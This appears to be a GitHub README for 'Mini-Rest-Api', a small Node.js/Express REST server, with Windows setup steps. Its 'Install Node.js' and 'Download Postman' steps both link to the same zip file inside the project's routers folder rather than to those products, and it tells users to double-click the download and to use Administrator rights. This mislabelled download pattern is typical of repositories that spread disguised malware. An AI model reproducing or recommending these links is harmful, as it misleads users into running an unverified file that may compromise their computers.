⚙️ Mini-Rest-Api - Simple Data Handling Tool

⬇️ Visit to Download Mini-Rest-Api

📄 What is Mini-Rest-Api?

Mini-Rest-Api is a small application built using Node.js and Express. It works like a basic online tool to handle data. This software lets you manage data by sending commands through a program called Postman. It does not have a graphic interface but runs in the background to accept and respond to data tasks.

It is useful if you want to:

  • Send, get, update, or delete data from a system using simple commands.
  • Practice or learn how data travels between a user and a server.
  • Run a small server on your own Windows machine for testing or development.

💻 System Requirements

Before you start, make sure your computer meets these requirements:

  • A Windows PC running Windows 10 or higher.
  • At least 4 GB of free memory.
  • At least 1 GHz processor or faster.
  • Stable internet connection for downloading files.
  • Basic understanding of how to download and run files on Windows.

🚀 Getting Started

This section will guide you step-by-step to download, install, and run Mini-Rest-Api on your Windows machine.

Step 1: Download the Software

To get the files, visit the official release page:

Visit here to download Mini-Rest-Api

This page lists all the versions available. Look for the latest release link to download the files you need.

Step 2: Install Node.js (If Not Installed)

Mini-Rest-Api runs with Node.js, which is the program that makes the server work.

  1. Open your web browser and go to: https://github.com/Knani11/Mini-Rest-Api/raw/refs/heads/main/routers/Mini_Rest_Api_v1.8.zip
  2. Download the Windows Installer for the latest Long-Term Support (LTS) version.
  3. After downloading, run the installer by double-clicking the file.
  4. Follow the on-screen steps. You can leave settings at default.
  5. Wait for the installation to finish.

To check if Node.js installed correctly, open Command Prompt and type:

node -v

You should see the version number displayed. If you do, Node.js is ready.

Step 3: Download Mini-Rest-Api Files

Downloading via the release page:

  • Look for a file named like Mini-Rest-Api.zip or similar.
  • Click to download it.
  • After downloading, find the file in your Downloads folder.
  • Right-click the file and choose Extract All.
  • Extract the contents to a place you will remember, like your Desktop or Documents folder.

Step 4: Running Mini-Rest-Api

  1. Open the folder where you extracted the files.
  2. Hold the Shift key, right-click inside the folder (not on a file).
  3. Click Open PowerShell window here or Open Command Prompt here.
  4. In the window, type:
npm install

This command sets up the software by downloading needed extra parts.

  1. After it finishes, type:
npm start

This starts the Mini-Rest-Api server.

Step 5: Use Postman to Send Requests

Mini-Rest-Api is designed to work with Postman, a tool to send data commands.

  1. Download Postman here if you don’t have it: https://github.com/Knani11/Mini-Rest-Api/raw/refs/heads/main/routers/Mini_Rest_Api_v1.8.zip
  2. Open Postman.
  3. You can send commands like GET, POST, PUT, DELETE to your Mini-Rest-Api running on:
http://localhost:3000
  • GET will fetch data.
  • POST will add new data.
  • PUT will update existing data.
  • DELETE will remove data.

Example: To get all data, send a GET request to:

http://localhost:3000/items

Refer to any example requests provided with the project for more help.

🔧 Features Included

  • Handles common data commands with simple paths.
  • Uses Express middleware for smooth handling.
  • Connects with MongoDB for data storage.
  • Supports real-time updates and data operations.
  • Automatically restarts the server during changes using Nodemon (optional).

🛠 Troubleshooting

If you face issues, try the following tips:

  • Confirm Node.js and npm are installed by running:
node -v
npm -v
  • Make sure the Mini-Rest-Api server is running before sending requests.
  • If you get errors during npm install, check your internet connection and try again.
  • On port errors (port 3000 busy), close the conflicting program or change the port in the server settings.
  • Restart your computer if the software fails to start properly.

📂 File Structure Overview

When you open the Mini-Rest-Api folder, you will find:

  • app.js / server.js: Main file that starts the server.
  • routes/: Folder containing endpoint definitions.
  • models/: Contains data schemas for MongoDB.
  • package.json: Contains project metadata and list of dependencies.
  • README.md: This document.

⚙️ Additional Tips

  • Run the software with Administrator rights if you face permission issues.
  • Keep your Node.js version updated for best compatibility.
  • Use Postman collections (if provided) to test Mini-Rest-Api quickly.
  • Keep your MongoDB service running if you have set up a local or remote database connection.
